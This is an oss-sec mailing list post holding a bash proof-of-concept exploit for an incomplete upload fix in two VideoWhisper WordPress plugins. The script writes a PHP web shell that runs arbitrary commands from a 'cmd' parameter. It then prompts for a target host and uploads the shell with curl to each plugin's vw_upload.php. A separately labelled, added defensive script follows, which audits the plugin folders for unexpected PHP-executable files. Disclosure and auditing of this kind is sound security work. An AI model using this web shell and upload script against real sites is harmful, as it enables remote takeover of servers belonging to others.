oss-sec mailing list archives

Exploit for VideoWhisper WP plugins file upload incomplete fix.


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Sat, 18 Apr 2015 06:06:13 -0700

#!/bin/bash
#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0

cat > shell.pht << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do 
echo -e ${red};
echo -e "                               VideoWhisper Remote File Upload PoC Redux $NC";
echo "                                          4/14/2015";
echo "                                     Larry W. Cashdollar, @_larry0";
echo
echo
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on those OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo "               - Advisories -";
echo "http://www.vapid.dhs.org/blog/04-16-2015/";;
echo "http://www.vapid.dhs.org/advisory.php?v=116";;
echo "http://www.vapid.dhs.org/advisory.php?v=117";;
echo 
echo
echo "Ctrl ^C to exit";
echo -n "Enter Target Hostname :";
read target;
echo -n "Enter 1 for integration 2 for presentation :";
read plugin;
echo -n "Enter payload filename or (shell.pht):";
read file;
echo "[+] Hostname $target";
echo "[+] File $file";
if [ $plugin == 1 ]; then
echo "[+] Targeting Video Conference Plugin";
echo
        curl --form "vw_file=@$file" --form "name=$file" --form "room=./" 
http://$target/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php
else
echo "[+] Targeting Video Presentation Plugin";
echo
        curl --form "vw_file=@$file" --form "name=$file" --form "room=./" 
http://$target/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php
fi;
done
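
The script's banner attributes the incomplete fix to Debian and Ubuntu handing .pht and .phtml files to PHP. The following audit for the two plugin directories is an added example, not part of the original post. It assumes the handler expression shown in the code matches your php5.conf; the function names and the baseline file layout are hypothetical.

```bash
#!/bin/bash
# Added example, not part of the original post: flag files in the two plugin
# directories that Apache would run as PHP and that a clean install lacks.

# Assumption: the FilesMatch expression from Debian/Ubuntu's php5.conf,
# anchored to the last path component. Use the one from your own config.
PHP_HANDLED_RE='(^|/)[^/]+\.ph(p[345]?|t|tml)$'

# Plugin directories named in the post, relative to the WordPress root.
PLUGIN_DIRS='wp-content/plugins/videowhisper-video-conference-integration/vc
wp-content/plugins/videowhisper-video-presentation/vp'

# audit_dir DIR BASELINE
# Prints PHP-handled files under DIR that are not listed in BASELINE
# (relative paths, one per line, taken from a clean copy of the plugin).
# Exit status follows grep: 0 when at least one unexpected file was printed.
audit_dir() {
    ( cd "$1" && find . -type f ) | sed 's|^\./||' |
        grep -E "$PHP_HANDLED_RE" | grep -Fxv -f "$2"
}

# audit_wp WP_ROOT BASELINE_DIR
# Audits every plugin directory present under WP_ROOT. BASELINE_DIR/vc.txt and
# BASELINE_DIR/vp.txt are the baselines (hypothetical layout); a missing
# baseline means every PHP-handled file in that directory is reported.
audit_wp() {
    rc=1
    for d in $PLUGIN_DIRS; do
        [ -d "$1/$d" ] || continue
        base="$2/$(basename "$d").txt"
        [ -f "$base" ] || base=/dev/null
        hits=$(audit_dir "$1/$d" "$base") || continue
        printf '%s\n' "$hits" | sed "s|^|$d/|"
        rc=0
    done
    return "$rc"
}

# Usage: ./audit.sh /var/www/wordpress /path/to/baselines
if [ "$#" -eq 2 ]; then
    audit_wp "$1" "$2"
fi
```

Any path it prints is a PHP-executable file that the clean plugin does not ship and should be reviewed.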
